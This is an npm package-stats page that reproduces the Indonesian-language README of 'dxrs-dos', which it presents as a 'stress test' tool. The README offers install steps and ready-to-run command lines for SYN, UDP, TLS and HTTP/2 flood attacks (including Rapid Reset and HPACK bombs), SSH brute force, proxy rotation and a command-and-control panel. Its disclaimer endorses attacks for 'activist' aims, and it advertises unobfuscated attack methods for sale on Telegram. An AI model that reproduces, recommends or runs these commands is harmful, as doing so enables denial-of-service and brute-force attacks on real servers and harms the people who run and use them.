npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

dxrs-dos

v0.1.3

Published

ZhirogamaNext

Readme


📖 TENTANG PROJECT

DXR Project adalah alat stress test jaringan tingkat lanjut yang dirancang untuk menguji ketahanan server dari Layer 4 (Transport) hingga Layer 7 (Application). Dibangun dengan Node.js, tools ini menawarkan 11+ metode serangan canggih dengan dukungan proxy, cookie injection, dan panel C2 (Command & Control) terintegrasi.

✨ FITUR UTAMA

  • 🎯 11+ Metode Serangan — L4 & L7 lengkap
  • 🧠 Interactive TUI — Menu interaktif berbasis terminal
  • 📡 Command Line Interface — CLI mode untuk automation
  • 🔀 Proxy Support — Injeksi proxy HTTP/HTTPS
  • 🍪 Cookie Injection — Support custom cookie untuk bypass
  • 🌐 C2 Panel Builder — Panel PHP untuk Command & Control
  • 🔍 Website Analyzer — Analisa target sebelum serangan
  • Proxy Checker — Filter proxy hidup & mati
  • 🛡️ License Protection — Sistem lisensi terenkripsi

📦 INSTALASI

Via NPM (Recommended)

npm install -g dxrs-dos
chmod +x $PREFIX/lib/node_modules/dxrs-dos/bin/dxr.js
dxr --help

Prasyarat Sistem

| Dependency | Requirement | |------------|-------------| | Node.js | v20+ | | PHP | v8.0+ (untuk Panel C2) | | 7z | Terinstall (untuk ekstraksi binary) | | npm | Latest |


🚀 CARA PEMAKAIAN

Mode Interaktif (TUI)

dxr

Menu yang tersedia:

[1] Information      — Info & versi alat
[2] Cek Website       — Analisa website target
[3] Proxy Checker     — Filter proxy
[4] Attack Menu       — Pilih metode serangan
[5] Create Panel C2   — Panel Command & Control

Mode Command Line (CLI)

dxr <METHOD> <ARGUMENTS> [FLAGS]

Struktur Argumen

| Flag | Alias | Deskripsi | |------|-------|----------| | --hst= | --host, -u | Target host/URL | | -t= | --time | Durasi serangan (detik) | | -cnt= | --request | Jumlah request per detik | | -thrd= | --thread | Jumlah thread paralel | | --cokie= | --cookie, -c | Cookie injection | | --proxy= | — | File proxy list | | --pwd= | — | Custom password (KILLSSH) | | --debug | — | Debug mode |


⚔️ METODE SERANGAN

📡 Layer 4 — Transport Layer

| # | Method | Deskripsi | Usage | |---|--------|-----------|-------| | 1 | TANKSYN | TCP SYN Flood | dxr TANKSYN <host> <time> <thread> [--debug] | | 2 | KILLSSH | SSH Brute Force | dxr KILLSSH <host> <username> <time> <request> <thread> [--debug] [--pwd=password] | | 3 | UDPGOD | UDP Flood | dxr UDPGOD <ip:port> <time> <thread> [--debug] | | 4 | FLOODTLS | TLS Flood | dxr FLOODTLS <host> <time> <thread> [--debug] [--proxy=./proxy.txt] |

🌐 Layer 7 — Application Layer

| # | Method | Deskripsi | Usage | |---|--------|-----------|-------| | 5 | XH2 | HTTP/2 Multiplex Flood | dxr XH2 <host> <time> <request> <thread> [--debug] [--proxy=./proxy.txt] | | 6 | H2RAPID | H2 Rapid Reset Attack | dxr H2RAPID <host> <time> <request> <thread> [--debug] [--proxy=./proxy.txt] | | 7 | H2RYUK | H2 Ryuk (Cookie Support) | dxr H2RYUK <host> <time> <request> <thread> [--debug] [--cookie=xxx] [--proxy=./proxy.txt] | | 8 | HPACK | HPACK Bomb Attack | dxr HPACK <host> <time> <request> <thread> [--debug] [--proxy=./proxy.txt] | | 9 | HTTPRAW | HTTP Raw Super Fast RPS | dxr HTTPRAW <host> <time> <thread> [--debug] | | 10 | KQH2 | KQ H2 Lite Attack | dxr KQH2 <host> <time> <request> <thread> [--debug] [--proxy=./proxy.txt] | | 11 | MRESET | MadeYouReset HTTP/2 Stream Flood | dxr MRESET <host> <time> <request> <thread> [--debug] [--proxy=./proxy.txt] |

🛠️ Utility Tools

| # | Method | Deskripsi | Usage | |---|--------|-----------|-------| | 12 | PROXY | Proxy Checker | dxr PROXY --file <file> [--c] | | 13 | WEBCHECK | Website Analysis | dxr WEBCHECK --url <url> |


📋 CONTOH PENGGUNAAN

Layer 4 Examples

# TCP SYN Flood
dxr TANKSYN --hst=https://target.com -t=60 -thrd=5 --debug

# SSH Brute Force
dxr KILLSSH --hst=server.target.com -t=root -cnt=100 -thrd=5 --debug --pwd=custompass

# UDP Flood
dxr UDPGOD --hst=203.0.113.10:8080 -t=60 -thrd=3

# TLS Flood with Proxy
dxr FLOODTLS --hst=https://target.com -t=10 -thrd=5 --debug --proxy=data.txt

Layer 7 Examples

# HTTP/2 Multiplex
dxr XH2 --hst=https://target.com -t=60 -cnt=100 -thrd=5 --debug --proxy=data.txt

# H2 Rapid Reset
dxr H2RAPID --hst=https://target.com -t=60 -cnt=100 -thrd=5 --debug --proxy=data.txt

# H2 Ryuk with Cookie
dxr H2RYUK --hst=https://target.com -t=60 -cnt=100 -thrd=5 --cokie=xxx.xx --debug --proxy=data.txt

# HPACK Bomb
dxr HPACK --hst=https://target.com -t=60 -cnt=100 -thrd=5 --debug --proxy=data.txt

# HTTP Raw Flood
dxr HTTPRAW --hst=https://target.com -t=60 -thrd=5 --debug

# KQ H2 Lite
dxr KQH2 --hst=https://target.com -t=60 -cnt=100 -thrd=5 --debug --proxy=data.txt

# MReset Flood
dxr MRESET --hst=https://target.com -t=60 -cnt=100 -thrd=5 --debug --proxy=data.txt

👥 CONTRIBUTOR


📊 PROJECT STATS


⚠️ DISCLAIMER

Alat ini ditujukan untuk melakukan uji stress pada website dari L4 sampai L7.
Alat ini cocok untuk pemula maupun yang sudah advance.

PERINGATAN:
Alat ini hanya boleh digunakan untuk serangan yang bertujuan dengan aktivis.
Jangan menyerang website masyarakat atau usaha kecil.

📞 KONTAK & SUPPORT

💡 Beli Methods tanpa di-obfuscate bisa hubungi via Telegram @anonchatQaxoh_bot — harga sangat terjangkau